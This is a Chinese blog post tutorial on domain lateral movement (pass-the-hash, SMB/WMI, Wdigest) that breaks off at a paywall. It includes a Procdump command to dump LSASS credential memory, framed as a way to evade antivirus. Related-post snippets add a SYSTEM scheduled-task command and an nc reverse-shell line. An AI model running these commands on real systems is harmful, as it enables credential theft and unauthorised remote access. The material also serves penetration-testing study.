内网安全学习(三)---横向渗透

已于 2022-02-13 20:48:28 修改
阅读量1k 收藏 4
点赞数 1
分类专栏: 内网安全 文章标签: 安全 哈希算法 算法
于 2022-02-09 20:45:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qi_SJQ_/article/details/122833939
版权

域横向 smb&wmi 明文或 hash 传递

在这里插入图片描述

1.前置知识:

知识点1:

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码。
Windows2012以下版本安装KB2871997补丁,也会导致无法获取明文密码。

针对以上情况,我们提供了4种方式解决此类问题:

  • 1.利用哈希hash传递(pth,ptk等)进行移动。
  • 2.利用其他服务协议(SMB,WMI等)进行哈希移动。
  • 3.利用注册表操作开启Wdigest Auth值进行获取。
  • 4.利用工具或第三方平台(Hachcat)进行破解获取,看收集到字典的质量。

在这里插入图片描述
知识点2:

Windows系统 LM HASH 及 NTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash。

2.Procdump+Mimikatz 工具 配合获取:

实战上用mimikatz获取密码往往会被杀,而Procdump是微软官方软件,因此绝对是不会被杀的,使用及下载地址
运行Procdump后本地生成lsass.dmp文件:
在这里插入图片描述
本地主机上再用mimikatz命令还原出来密码:
在这里插入图片描述

#procdump 配合 mimikatz:
procdump -accepteula -ma lsass
最低0.47元/天 解锁文章
暮w光
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透(四十)之横向移动篇-SMB远程执行命令横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-20 635
SMB 全称是 Server Message Block 翻译过来是服务器信息块,它也是一种客户端到服务器的通信协议。除此之外,SMB 协议也被称为请求-回复协议。客户端与服务器建立连接后,客户端可以向服务器发送SMB命令允许用户访问共享、打开、读取或者是写入文件。利用条件:开启了445端口。
横向渗透之PsExec工具使用
qq_46258964的博客
04-16 3647
psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限 PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程, 并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。 PsExec的基本原理是: 通过管道在远程目标机器上创建一个psexec服务, 并在本地磁盘中生成一个名为PSEXESVC的二进制文件, 然后通过psexec服务运行命令,运行结束后删除任务。 利用条件 445端口开放, 知道目标账号密码 PsExec下载地址 优点:可以躲避检测无视杀毒软件
内网渗透-内网横向移动的九种方式
最新发布
lza20001103的博客
04-14 888
内网横向移动的九种方式
内网安全-横向移动】基于SMB协议-PsExec
02-10 8573
横向移动-基于SMB协议】PsExec
[内网] 横向渗透的几种方式
weixin_43586169的博客
07-28 4605
详细介绍了,横向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
内网渗透——横向移动
LainWith的博客
10-09 2362
目录环境利用Windows计划任务【借助明文账密】利用 at 建立连接利用 schtasks 建立连接哈希值传递攻击哈希传递攻击适用情况知识背景PTH漏洞原理实操PTKPTT——MS14-068方式1:使用mimikatz方式2:使用kekeo方式3:利用本地票据(需管理员权限)Impacket中的Atexec【支持明文&哈希】其他协议——SMB服务利用使用psexec使用smbexec【支持明文&哈希】其他协议——WMI服务利用【支持明文&哈希】1. 自带WMIC命令,明文传递,无
内网渗透思路整理与工具使用
12-08
内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用内网渗透思路整理与工具使用
内网渗透技巧
05-31
内网渗透技巧思路篇,懂得安全的小伙伴可以下载看看。
企业内网横向渗透检测和拦截实践.pdf
09-11
企业内网横向渗透检测和拦截实践 安全众测 网络安全 法律法规 渗透测试 移动安全
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
GKAQZYZSJNSJ-028内网横向渗透测试与实战课程级别 信息安全专业工业互联网安全方向 实验概述 首先在VMware通过新建虚拟机的方式,使用系统镜像文件,安装好WinServer2008和Win7,以及win2000sever,都按照推荐或默认...
工控安全职业证书技能实践:内网横向渗透测试与实战.pptx
07-11
工控安全职业证书技能实践:内网横向渗透测试与实战.pptx
内网渗透系列:横向渗透方法小结
闵行小鱼塘
08-04 4134
本文学习并小结下横向渗透的方法
网络攻防之内网安全横向渗透权限提升
weixin_46626737的博客
06-30 678
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1163
内网环境下的横向移动总结
内网横向移动常用方法总结
da_chuan_chuan的博客
04-27 3633
文章目录前言一、通过at&schtasks进行明文传递二、、atexec进行明文与HASH传递SMB 服务利用1、psexec工具传递2、smbexec工具传递四、WMI 服务利用1、wmic传递2、cscript传递3、wmiexec传递五、PTH横向传递攻击六、PTK横向传递攻击二、使用步骤1.引入库2.读入数据总结 前言 当我们拿下webshell后,若其服务器有内网环境,在进一步测试中就需要进行内网渗透测试,对于内网渗透测试的方法常用的为:基于口令的横向移动和基于漏洞的攻击。本文主要从基
SMB横向利用
weixin_30731305的博客
07-24 757
一.IPC作用 利用IPC$,连接者甚至可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息 二.ipc$的利用条件 1.139,445端口开启。 ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,i...
域内横向渗透学习
qq_45674677的博客
12-04 4313
域内横向移动总结 在内网渗透中,最重要的一部分就是横向移动,攻击者利用该技术可以也凭借拿到shell的主机当作跳板,访问域内的其他主机,从而扩大攻击面,进一步往域控进攻,最后控制整个内网权限。 0x001横向移动常见工具使用: SMB横向-psexec&smbexec SMB渗透至Hash传递攻击原理:**SMB可以直接基于TCP协议或者NetBIOS over TCP,SMB的认证可以基于SMB,也可以基于kerberos,这两种认证方式,前者本质上使用了hash,后者本质上使用了ticket,
SMB暴力破解攻击,什么鬼?
热门推荐
三分恶的博客
03-31 1万+
最近在做的项目线上环境是Windows Server,有一天,安全检查的时候发现产环境服务器高危——服务器遭受了SMB暴力破解攻击! 遇到事情不要慌,先发……百度一下。 暴力破解攻击:暴力破解攻击是指攻击者通过系统的组合所有可能性(例如登录时用的账户名.密码),尝试所有的可能性破解用户的账户名.密码等敏感信息,攻击者会经常使用自动化脚本组合出正确的用户名和密码。  暴力破解攻击是一种穷...
003--横向渗透的常见方法
weixin_44508748的博客
07-22 2920
在已经攻占部分内网主机的前提下,利用现有的资源尝试获取更多的凭据、更高的权限,进而达到控制整个网段、拥有最高权限的目的。在很多时候,内网渗透的起点往往只是一台通过各种漏洞漏洞攻陷的跳板,通过这个突破口去不断扩大在本网段内的战果,是为横向渗透。 一、系统漏洞 0day 二、流量监听 、ARP欺骗 四、服务密码攻击 ...
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值